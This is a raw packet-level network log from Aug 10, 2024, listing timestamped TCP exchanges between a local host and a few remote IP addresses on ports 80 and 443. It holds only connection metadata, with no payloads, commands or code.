Aug 10, 2024 16:12:25.672038078 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.672049999 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.672064066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.672066927 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.672077894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.672094107 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.672111988 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.672111988 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.672121048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.672133923 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.672147036 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.672172070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.672185898 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.672192097 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.672192097 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.672192097 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.672192097 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.672199965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.672215939 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.672230005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.672245979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.672300100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.672300100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.672300100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.672300100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.672405005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.672420025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.672768116 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.679672003 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.679687977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.679702044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.679724932 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.679738045 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.679753065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.679768085 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.679768085 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.679821968 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.679821968 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.679869890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.679883957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.679905891 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.679920912 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.679934978 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.679935932 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.679949999 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.679965019 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.679979086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.679980993 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.679981947 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680002928 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680017948 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680026054 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680026054 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680026054 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680035114 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680052996 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680056095 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680056095 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680131912 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680151939 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680166006 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680180073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680195093 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680208921 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680218935 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680233002 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680247068 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680260897 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680277109 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680280924 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680280924 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680280924 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680290937 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680299044 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680305958 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680320024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680335045 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680336952 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680336952 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680349112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680356026 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680363894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680377960 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680392981 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680408955 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680408955 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680408955 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680408955 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680434942 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680434942 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680448055 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680545092 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680627108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680655956 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680671930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680685043 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680700064 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680713892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680718899 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680718899 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680751085 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680761099 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680802107 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680815935 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680830002 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680852890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680866957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680876970 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680876970 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680876970 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680881023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680896044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680911064 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680917025 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680917025 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680917025 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680927038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.680948973 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680948973 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.680965900 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681004047 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681016922 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681030035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681045055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681058884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681061029 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681073904 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681071043 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681071043 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681088924 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681097984 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681102991 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681116104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681128025 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681132078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681148052 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681174994 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681190014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681195021 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681195021 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681202888 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681210995 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681217909 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681231976 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681246042 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681261063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681273937 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681281090 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681281090 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681281090 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681281090 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681281090 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681288004 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681293964 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681313992 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681327105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681341887 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681346893 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681346893 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681355953 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681360006 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681369066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681385040 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681387901 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681400061 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681413889 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681427002 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681461096 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681461096 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681461096 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681468964 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681482077 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681495905 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681510925 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681515932 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681515932 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681515932 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681524992 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681533098 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681554079 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681566954 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681581020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681596041 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681598902 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681598902 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681598902 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681598902 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681611061 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681617022 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681626081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681643963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.681663036 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681663036 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.681718111 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.694883108 CEST	80	49732	185.225.200.214	192.168.2.4
Aug 10, 2024 16:12:25.695259094 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.695272923 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.695337057 CEST	49732	80	192.168.2.4	185.225.200.214
Aug 10, 2024 16:12:25.695396900 CEST	49732	80	192.168.2.4	185.225.200.214
Aug 10, 2024 16:12:25.695441008 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.695446014 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.695728064 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.695743084 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.695796967 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.695801020 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.695811987 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.695842981 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.696012974 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.696084976 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.696122885 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.696129084 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.696140051 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.696500063 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.701368093 CEST	80	49732	185.225.200.214	192.168.2.4
Aug 10, 2024 16:12:25.702316999 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.702331066 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.702414989 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.702419043 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.702586889 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.702636957 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.702649117 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.702696085 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.702703953 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.702712059 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.702760935 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.702945948 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.702960014 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.703017950 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.703017950 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.703022957 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.703056097 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.703351974 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.703365088 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.703490973 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.703495026 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.703607082 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.717017889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717071056 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717086077 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717097998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717113018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717144966 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717168093 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717192888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717206955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717221975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717246056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717248917 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717256069 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717259884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717273951 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717283010 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717288971 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717305899 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717309952 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717320919 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717333078 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717335939 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717355967 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717360020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717369080 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717381954 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717530012 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717576981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717591047 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717633963 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717648029 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717663050 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717679024 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717711926 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717721939 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717721939 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717761993 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717777967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717792034 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717807055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717822075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717838049 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717853069 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717855930 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717878103 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717881918 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717894077 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717905045 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717911005 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.717931986 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.717946053 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.718266010 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.718295097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.718303919 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.718319893 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.718324900 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.718333960 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.718348026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.718363047 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.718369961 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.718385935 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.718386889 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.718400955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.718413115 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.718415976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.718430996 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.718432903 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.718444109 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.718446970 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.718456030 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.718472958 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.718482018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.718483925 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.718508005 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.718523026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.718544960 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.718566895 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.719132900 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.719177961 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.719356060 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.719368935 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.719382048 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.719398022 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.719413042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.719420910 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.719427109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.719434023 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.719443083 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.719454050 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.719465017 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.719484091 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.727449894 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.727474928 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.727490902 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.727504969 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.727523088 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.727540016 CEST	80	49739	147.45.44.104	192.168.2.4
